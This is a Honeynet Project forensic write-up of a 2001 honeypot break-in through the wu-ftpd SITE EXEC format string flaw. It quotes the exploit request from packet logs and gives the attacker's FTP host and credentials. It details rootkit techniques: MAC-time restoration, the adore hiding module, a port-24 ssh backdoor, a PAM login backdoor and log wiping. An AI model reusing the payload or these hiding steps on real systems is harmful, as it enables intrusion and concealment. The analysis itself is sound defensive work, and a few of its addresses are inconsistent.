Scan 19 Results

Analysis provided by Jerome Poggi, Hervé Schauer Consultants (HSC)
The Honeynet Project


The Challenge:
On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotly logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which is encrypted). The attacker also tried to hide some of his edits from the MAC times.

  1. Which vulnerability did the intruder exploit?
  2. What ways, and in what order, did the intruder use to connect and run commands on the system?
  3. How did the intruder try to hide his edits from the MAC times?
  4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
  5. Recover (tell how you did it too) the rootkits from the snort binary capture
  6. What does the rootkit do to hide the presence of the attacker on the system?
  7. What did you learn from this exercise?
  8. How long did this challenge take you?

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

The Analyse: The first step is to download the file and confirm the MD5 Checksum, this validates the integrity of the file. Then the analysis can begin.

$wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
$md5 scan19.tar.gz
11e0be295d138df14111796a7733a5d2 scan19.tar.gz
$tar -zxvf scan19.tar.gz

Our data was correct, so we can begin to analyse them.
For convinience I use tcpflow to extract all data from newdat2.log, now I have a file for each stream (couple of IP.port and computer)
For getting information on tcp stream I use tethereal and ethereal.

1. Which vulnerability did the intruder exploit?
The intruder use a remote root exploit (SITE EXEC). Advisory :

  1. CVE-2000-0573
  2. CERT/CC
  3. RedHat
The intruder send the exploit in packets 411(01:55:58.3725) and 414(01:55:59.4857) and obtain shell root at packet 415(01:55:59.5296).

2. What ways, and in what order, did the intruder use to connect and run commands on the system?

  • The intruder after multiple try by netbios, dns, portmap and ISAKMP use telnet to try to logon as nobody with password "ultravirus" and "virus".
  • He also try to initiate a connexion on port 24 (the ssh backdoor that he left) and check if a irc relay was present.
  • At 01:55:45.1987 he initiate the ftp connection, that he use to exploit the string format vulnerability of wu-ftp 2.6.0(1).
    The program used here is 7350wu-v5.tar.gz. We can find also in the file copy.tar.gz with the name zxploit.
  • The intruder blank the password of the user nobody. After he save the timestamp of /etc/passwd and /etc because he add a user named dns with uid/gid 0/0. After the user was add, he put the old timestamp on /etc/passwd and /etc.
  • After he connect directly to the computer with telnet, he log with user nobody and do a su to dns, so he was identify in log as nobody.

3. How did the intruder try to hide his edits from the MAC times?

The intruder try to hide his edits from MAC times in saving the MAC times of /etc and /etc/passwd. The problem is that he don't save the MAC time from /etc/shadow. He use the directory /etc/X11/applnk/Internet/.etc and /etc/X11/applnk/Internet/.etcpasswd to save the MAC time. He don't remove this to directory.
A ls -lt /etc give :

-r--------    1 root     root          678 Sep 16 04:40 shadow
-rw-------    1 root     root            5 Sep 16 04:40 group.lock
-rw-------    1 root     root            5 Sep 16 04:40 gshadow.lock
-rw-r--r--    1 root     root          728 Sep 16 04:40 passwd-
-r--------    1 root     root          667 Sep 16 04:40 shadow-
-rw-r--r--    1 root     root          728 Sep 16 04:31 passwd
We can date exactly his attak.

4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

The Intruder download his rootkit to /dev/rd/scd0 from he host in Romania (ftp://teleport:gunoierul@teleport.go.ro).i
He download 3 files :

  • Zer0.tar.gz : It's a tornkit with adore and without all trojaned file that can be found usualy in tornkit. The part of the tornkit use is the cleaner and the installation of adore. , but very modified by Viruzzel. The rootkit contain adore 0.39 (the last adore pack), this rootkit do not contain trojan file like ls, ps, ifconfig...
  • copy.tar.gz contain some client program : smurf5 DDOS program, ssh client (ssh), the exploit program (zxploit aka 7350wu-v5), a scanner of wu-ftp (wu-scan).
  • ooty.tar.gz contain some local root exploit.
It's a rootkit made with a lot of different root-kit, he personnalize it.

5. Recover (tell how you did it too) the rootkits from the snort binary capture

For recoverring the root kit I use tcpflow

$ tcpflow -v -r newdat3.log port 20
tcpflow[22438]: tcpflow version 0.20 by Jeremy Elson 
tcpflow[22438]: looking for handler for datalink type 1 for interface newdat3.log
tcpflow[22438]: found max FDs to be 16 using OPEN_MAX
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01026: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01026: opening new output file
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01027: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01027: opening new output file
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01028: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01028: opening new output file
We have now 3 files, but we don't know the real name.
$tcpflow -v -r newdat3.log dst port 21 and host 193.231.236.042
tcpflow[22546]: tcpflow version 0.20 by Jeremy Elson 
tcpflow[22546]: looking for handler for datalink type 1 for interface newdat3.log
tcpflow[22546]: found max FDs to be 16 using OPEN_MAX
tcpflow[22546]: 192.168.001.102.01025-193.231.236.042.00021: new flow
tcpflow[22546]: 192.168.001.102.01025-193.231.236.042.00021: opening new output file
$ cat 192.168.001.102.01025-193.231.236.042.00021
USER teleport
PASS gunoierul
SYST
CWD new
TYPE I
PORT 192,168,1,102,4,2
RETR Zer0.tar.gz
PORT 192,168,1,102,4,3
RETR copy.tar.gz
PORT 192,168,1,102,4,4
RETR ooty.tar.gz
QUIT
0x0402 = 1026 so 193.231.236.042.00020-192.168.001.102.01026 is Zer0.tar.gz
0x0403 = 1027 so 193.231.236.042.00020-192.168.001.102.01027 is copy.tar.gz
0x0404 = 1028 so 193.231.236.042.00020-192.168.001.102.01028 is ooty.tar.gz

6. What does the rootkit do to hide the presence of the attacker on the system?

We can find in file 192.168.001.102.00023-217.156.093.166.61216 the complete trace of what the intruder received when download rootkit and install it.

  • Check the syslog message go to some other computer
  • The root kit save MAC times of /bin, /usr/X11R6/bin and /etc/rc.d/rc3.d
  • Use /usr/X11R6/bin/.,/copy/ to put the trojaned SSH (listen on port 24/tcp) and the zsh shell (here it's a copy of /bin/bash with perm 7777).
  • Start the shell /dev/rd/nscd.init at the startup (rc3.d) to hide with adore all of his suspect file :)
  • Compile Adore and download Make and/or gcc if needed
  • hide a lot of directory and files (/usr/X11R6/bin/., /usr/info/.t0rn /dev/rd/sdc0 /dev/rd/nscd.init /etc/rc.d/rc3.d/S50inet /usr/X11R6/lib/X11/.~)
  • Install a login backdoor (vrssnk) that modify pam
  • Clean is temporary files
  • Clean the /var/log files of word login, ftp and dns
  • Restore MAC times of /bin, /usr/X11R6/bin and /etc/rc.d/rc3.d

7. What did you learn from this exercise?

How to read correctly a tcpdump files and how a intruder really "work".

8. How long did this challenge take you?

It take to me a time near to two day (cummulative time).

Bonus question. write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

We admit that the IP of the compromize computer was 192.168.1.102 even it's a private addresse.
Message to the administrator of the computer that had the IP 217.156.93.166 :

I had a lot of informations that help me to think that your computer was compromised by a hacker and use it to compromise my computer (IP: 192.160.1.102).
Here you can find some information, evidence and logs :

  • At 2001-09-17 01:55:45.1987i the intruder connect from 207.35.251.172 to our ftp server.
    229 2001-09-17 01:55:45.1987 207.35.251.172 -> 192.168.1.102 TCP 74 2243 > 21 [SYN] Seq=3480775092 Ack=0 Win=32120 Len=0
    230 2001-09-17 01:55:45.2016 192.168.1.102 -> 207.35.251.172 TCP 74 21 > 2243 [SYN, ACK] Seq=3956112893 Ack=3480775093 Win=32120 Len=0
    231 2001-09-17 01:55:45.2361 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480775093 Ack=3956112894 Win=32120 Len=0
  • At 2001-09-17 01:55:52.5527 The intruder send some large request to obtain a buffer overflow.
    245 2001-09-17 01:55:52.5527 207.35.251.172 -> 192.168.1.102 FTP 482 Request: SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
  • At 2001-09-17 01:55:59.4857 the intruder send the root shell
  • At 2001-09-17 01:56:01.4916 the intruder had the confirmation of he was root.
    416 2001-09-17 01:56:01.4916 207.35.251.172 -> 192.168.1.102 FTP 70 Request: id;
    417 2001-09-17 01:56:01.5388 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [ACK] Seq=3956149945 Ack=3480792757 Win=32120 Len=0
    418 2001-09-17 01:56:01.7424 192.168.1.102 -> 207.35.251.172 FTP 105 Response: uid=0(root) gid=0(root) groups=50(ftp)
    419 2001-09-17 01:56:01.8020 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480792757 Ack=3956149984 Win=31856 Len=0
  • At 2001-09-17 02:12:54.4741 he change the password of nonody
  • At 2001-09-17 02:22:12.4272 he had the user dns without password
  • At 2001-09-17 02:44:48.7986 The intruder do a complete tcp port scan.
    Ports Open:
    telnet    23/tcp (discover at 02:44:54.2737)
    trojan  1024/tcp (discover at 02:44:58.2773)
    ftp       21/tcp (discover at 02:45:06.2565)
    who      513/udp (discover at 02:45:15.5809)
    smtp      25/tcp (discover at 02:45:17.6521)
    auth     113/tcp (discover at 02:45:18.1396)
    linuxconf 98/tcp (discover at 02:45:29.2826)
    rpc      111/tcp (discover at 02:45:32.4353)
    printer  515/tcp (discover at 02:45:38.8030)
    unknow   921/tcp (discover at 02:45:41.8367)
    finger    79/tcp (discover at 02:46:02.1268)
  • At 2001-09-17 02:56:12.4702 The intruder close the connexion.
    23392 2001-09-17 02:56:12.4702 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [FIN, ACK] Seq=3480793419 Ack=3956202690 Win=31856 Len=0
    23393 2001-09-17 02:56:12.5182 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [ACK] Seq=3956202690 Ack=3480793420 Win=32120 Len=0
    23394 2001-09-17 02:56:15.3943 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [FIN, ACK] Seq=3956202690 Ack=3480793420 Win=32120 Len=0
    23395 2001-09-17 02:56:15.4731 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480793420 Ack=3956202691 Win=31856 Len=0

  • Please do all the procedure to reinstall your computer and do some investigation to obtain the maximum of information to know how your computer was compromise.

    Sincerly.